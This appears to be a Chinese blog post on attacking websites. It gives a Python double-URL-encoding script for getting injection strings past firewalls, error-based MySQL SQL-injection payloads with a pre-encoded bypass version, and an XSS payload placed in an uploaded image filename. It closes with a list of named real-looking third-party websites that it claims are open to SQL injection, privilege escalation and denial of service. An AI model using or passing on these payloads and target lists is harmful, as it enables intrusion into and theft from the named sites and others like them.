此文章会持续更新,我会发一些已经存在漏洞的网站实例在上边,以便于大家更好直观如何进行Web攻击
本文章的所提到的网站漏洞只是本人猜想,并没有证实,如果发现有雷同的网站漏洞和纯属巧合。
发布网站安全类的网站
第一步:关注漏洞网站
【国家信息安全漏洞共享平台】
https://www.cnvd.org.cn/
【CVE】
https://cve.mitre.org/
【漏洞盒子】斗象科技
https://planet.vulbox.com/detail/MTIxODE=
【山西鑫鼎宸科技股份有限公司】
http://www.sxxdckj.com/cms/c/qita.html?page=2
【360补天平台】
https://www.butian.net/Reward/plan/1
第二步:熟悉扫描工具
例如:
HCL AppScan Standard 【常见的扫描工具】
sqlmap_GUI【进阶版SQl注入工具】
python代码编写【手搓核弹,手动编写代码攻击】
第三步:了解各种防御手段,例如拦截XSS攻击和SQl注入,一般的代码是屏蔽特殊字段和url转译
利用python编写一段代码绕开防火墙和代码拦截
import string
payload=";p";
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
print (retVal)
上传这一段是写了一个url2次编码,可以绕过防火墙XSS/SQL等特殊字节
被直接屏蔽掉
SQL数据注入
1.通过检索框注入
mysql 数据库在搜索框中输入:
1' and extractvalue(
会有暴库的效果,但由于防火墙和代码不让你输入特殊字符和关键词,这时候就可以进行url转码变成
1%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528
这样会绕开防火墙的检测。
2.通过ORDER BY 注入
select * from users order by 字段 ASC ;
将字段
变成 一下语句利用mysql 函数,进行暴库
extractvalue(1,(select concat(0x7e,user())))
3.通过上传图片xss攻击
将一张图片名改为,即可实现xss攻击
<img src=x οnerrοr='prompt(1)'>aaaa.jpg
4.常见高危端口
常见的高危端口主要有以下五类,表1-1提供了常见高危端口的不完全列表,供参考。
- ●远程管理服务:远程运维是企业IT运维人员的日常工作,而多数远程管理服务都是攻击者的首选目标,直接开放风险巨大。建议部署运维审计系统(如华为UMA1000),并通过VPN接入内网后登录。如未部署运维审计系统,请务必选择安全的加密应用,如SSHv2。
- ●局域网服务:这些服务端口安全漏洞多,常被攻击者利用,造成严重的安全事件。此类服务主要应用于企业内网访问,完全可以在出口防火墙上封禁。一般情况下,企业自建DNS服务器仅限于解析自有域名,不会对外开放,因此可以在互联网出口防火墙上封禁DNS服务。
- ●互联网服务:SMTP、POP3、IMAP等邮件协议在设计之初没有内置安全性,请使用SSL/TLS加密保护。同样,如果需要对外提供Web服务,请使用HTTPS协议替代HTTP。
- ●数据库:所有的数据库端口都不应该对外开放。
- ●木马常用端口:攻击者在主机中植入木马以后,会在失陷主机中开放后门端口。常用的后门端口很多,如123、1234、12345、666、4444、3127、31337、27374等。在病毒爆发时期,请封禁此类端口。
已经发现漏洞的网站
已经证实有网站安全问题,如有疑问可以在底下留言评论查看详细漏洞
sql回显
- http://www.sanfengruike.com
- http://whdkkj.com
- https://www.0735.org.cn
- http://www.km.cn
用户越权
- http://www.gzyxlib.cn/
SQL注入
- http://www.hailuozy.com/index.html
- http://qiantucc.com/index.html
- http://ys.zeiot.cn/xmxz2.aspx
DOS攻击
http://cmp.tcl.com:82/Frame/Login.htm